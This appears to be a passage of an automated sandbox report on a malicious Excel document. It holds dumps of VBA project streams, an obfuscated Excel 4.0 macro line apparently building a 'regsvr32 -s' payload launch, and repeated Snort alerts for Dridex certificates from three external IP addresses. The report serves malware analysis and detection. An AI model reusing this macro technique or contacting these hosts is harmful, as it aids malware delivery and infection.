                                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 820
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:820
                                                                                                                                                            Entropy:6.49145935167
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                            Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                            CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                                                            
                                                                                                                                                            "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            01/12/21-07:39:50.885082TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434916677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:39:54.260102TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084916880.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:39:54.832983TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:39:54.832983TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:39:55.937339TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917177.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:39:56.456760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917280.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:39:56.959729TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:39:56.959729TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:39:57.985172TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917577.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:39:58.507888TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917680.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:39:59.021977TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:39:59.021977TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:00.063389TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917977.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:00.568408TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918080.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:01.077106TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:01.077106TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:02.122035TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918377.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:02.638255TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918480.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:03.167707TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:03.167707TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:04.216497TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918777.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:04.735032TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918880.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:05.252447TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:05.252447TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:06.290814TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919177.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:06.806955TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919280.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:07.313185TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:07.313185TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:08.344389TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919577.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:08.889039TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919680.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:09.564984TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:09.564984TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:11.713544TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919977.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:12.225540TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920080.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:12.731816TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:12.731816TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:13.772564TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920377.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:14.296498TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920480.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:14.799192TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:14.799192TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:15.832708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920777.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:16.342420TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920880.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:16.857184TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:16.857184TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:17.058584TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492105.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:17.058584TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492105.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:18.097916TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:18.603747TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:19.114602TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492145.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:19.114602TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492145.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:20.146485TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:20.671722TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:21.196019TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492185.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:21.196019TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492185.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:22.234646TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:22.753345TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:23.278831TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492225.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:23.278831TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492225.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:24.288884TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:24.802850TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:25.323114TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:25.323114TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:26.363502TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:27.014090TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:27.920636TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492305.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:27.920636TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492305.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:30.113730TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923377.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:30.636405TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923480.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:31.158374TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492365.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:31.158374TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492365.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:32.462321TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:32.977618TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:33.493844TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492405.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:33.493844TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492405.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:34.535433TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:35.049541TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:35.587796TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492445.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:35.587796TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492445.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:36.631721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:37.151091TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:37.679406TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492485.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:37.679406TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492485.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:38.685161TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:39.195872TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:39.697057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492525.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:39.697057TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492525.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:40.730827TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:41.245867TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:41.750896TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492565.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:41.750896TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492565.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:42.774067TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:43.296962TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:43.811516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492605.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:43.811516TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492605.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:44.976768TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:45.829839TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:46.827773TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492645.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:46.827773TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492645.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:47.942837TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:48.445080TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:48.960677TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492685.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:48.960677TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492685.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:50.002373TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:50.526520TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:51.054206TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492725.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:51.054206TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492725.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:52.101597TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:52.613841TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:53.144173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492765.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:53.144173TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492765.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:54.177886TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:54.688968TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:55.201923TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492805.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:55.201923TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492805.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:56.221548TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:56.751571TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:57.255002TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492845.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:57.255002TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492845.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:58.289483TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:40:58.810733TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:40:59.330128TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492885.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:40:59.330128TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492885.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:00.361535TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:00.883725TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:01.393800TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492925.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:01.393800TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492925.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:02.555784TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:03.225375TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:04.101775TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492965.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:04.101775TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492965.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:05.159917TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:05.674749TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929980.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:06.191113TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493005.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:06.191113TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493005.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:07.252962TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930277.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:07.764923TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930380.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:08.271657TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493045.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:08.271657TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493045.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:09.305661TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930677.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:09.804909TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930780.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:10.328765TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493085.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:10.328765TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493085.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:11.370777TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931077.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:11.881780TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931180.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:12.399154TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493125.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:12.399154TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493125.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:13.430651TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931477.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:13.962265TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931580.86.91.27192.168.2.22
                                                                                                                                                            01/12/21-07:41:14.471359TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493165.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:14.471359TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493165.100.228.233192.168.2.22
                                                                                                                                                            01/12/21-07:41:15.507911TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931877.220.64.37192.168.2.22
                                                                                                                                                            01/12/21-07:41:16.017955TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931980.86.91.27192.168.2.22
